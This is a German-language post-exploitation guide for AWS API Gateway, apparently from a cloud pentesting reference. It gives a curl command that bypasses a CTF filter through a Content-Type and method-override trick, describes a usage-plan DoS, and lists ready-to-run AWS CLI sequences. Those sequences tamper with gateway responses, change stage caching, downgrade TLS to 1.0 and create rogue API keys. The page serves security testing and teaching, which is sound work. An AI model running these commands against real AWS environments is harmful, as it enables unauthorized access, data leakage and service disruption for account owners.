AWS - API Gateway Post Exploitation

API Gateway

Für weitere Informationen siehe:

Zugriff auf nicht freigegebene APIs

Du kannst einen Endpunkt unter https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint mit dem Dienst com.amazonaws.us-east-1.execute-api erstellen, den Endpunkt in einem Netzwerk freigeben, auf das du Zugriff hast (möglicherweise über eine EC2-Maschine), und eine Sicherheitsgruppe zuweisen, die alle Verbindungen zulässt. Dann kannst du von der EC2-Maschine aus auf den Endpunkt zugreifen und somit die Gateway-API aufrufen, die zuvor nicht freigegeben war.

Umgehung der Request-Body-Passthrough

Diese Technik wurde in diesem CTF-Writeup gefunden.

Wie in der AWS-Dokumentation im Abschnitt PassthroughBehavior angegeben, wird standardmäßig der Wert WHEN_NO_MATCH beim Überprüfen des Content-Type Headers der Anfrage die Anfrage ohne Transformation an das Backend weiterleiten.

Daher hatte im CTF das API Gateway eine Integrationstemplate, das verhinderte, dass die Flagge in einer Antwort exfiltriert wurde, wenn eine Anfrage mit Content-Type: application/json gesendet wurde:

RequestTemplates:
application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'

Das Senden einer Anfrage mit Content-type: text/json würde diesen Filter jedoch umgehen.

Da das API Gateway nur Get und Options erlaubte, war es schließlich möglich, eine beliebige dynamoDB-Abfrage ohne Einschränkung zu senden, indem eine POST-Anfrage mit der Abfrage im Body gesendet und der Header X-HTTP-Method-Override: GET verwendet wurde:

curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'

Usage Plans DoS

Im Abschnitt Enumeration kannst du sehen, wie man den Nutzungsplan der Schlüssel erhält. Wenn du den Schlüssel hast und er auf X Nutzungen pro Monat begrenzt ist, könntest du ihn einfach verwenden und einen DoS verursachen.

Der API Key muss einfach in einem HTTP-Header namens x-api-key enthalten sein.

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

Ein Angreifer mit den Berechtigungen apigateway:UpdateGatewayResponse und apigateway:CreateDeployment kann eine bestehende Gateway-Antwort modifizieren, um benutzerdefinierte Header oder Antwortvorlagen einzufügen, die sensible Informationen leaken oder bösartige Skripte ausführen.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Update the Gateway Response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations op=replace,path=/responseTemplates/application~1json,value="{\"message\":\"$context.error.message\", \"malicious_header\":\"malicious_value\"}"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potenzielle Auswirkungen: Leckage von sensiblen Informationen, Ausführung bösartiger Skripte oder unbefugter Zugriff auf API-Ressourcen.

apigateway:UpdateStage, apigateway:CreateDeployment

Ein Angreifer mit den Berechtigungen apigateway:UpdateStage und apigateway:CreateDeployment kann eine bestehende API Gateway-Stufe modifizieren, um den Datenverkehr zu einer anderen Stufe umzuleiten oder die Cache-Einstellungen zu ändern, um unbefugten Zugriff auf zwischengespeicherte Daten zu erhalten.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Update the API Gateway stage
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true,op=replace,path=/cacheClusterSize,value="0.5"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potentieller Einfluss: Unbefugter Zugriff auf zwischengespeicherte Daten, Störung oder Abfangen von API-Verkehr.

apigateway:PutMethodResponse, apigateway:CreateDeployment

Ein Angreifer mit den Berechtigungen apigateway:PutMethodResponse und apigateway:CreateDeployment kann die Methodenantwort einer bestehenden API Gateway REST API Methode ändern, um benutzerdefinierte Header oder Antwortvorlagen einzufügen, die sensible Informationen leaken oder bösartige Skripte ausführen.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Update the method response
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potentieller Einfluss: Leckage von sensiblen Informationen, Ausführung bösartiger Skripte oder unbefugter Zugriff auf API-Ressourcen.

apigateway:UpdateRestApi, apigateway:CreateDeployment

Ein Angreifer mit den Berechtigungen apigateway:UpdateRestApi und apigateway:CreateDeployment kann die API Gateway REST API-Einstellungen ändern, um das Logging zu deaktivieren oder die minimale TLS-Version zu ändern, was die Sicherheit der API potenziell schwächen kann.

API_ID="your-api-id"

# Update the REST API settings
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potentieller Einfluss: Schwächung der Sicherheit der API, was möglicherweise unbefugten Zugriff oder die Offenlegung sensibler Informationen ermöglicht.

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

Ein Angreifer mit den Berechtigungen apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan und apigateway:CreateUsagePlanKey kann neue API-Schlüssel erstellen, sie mit Nutzungsplänen verknüpfen und diese Schlüssel dann für unbefugten Zugriff auf APIs verwenden.

# Create a new API key
API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')

# Create a new usage plan
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY

Potentieller Einfluss: Unbefugter Zugriff auf API-Ressourcen, Umgehung von Sicherheitskontrollen.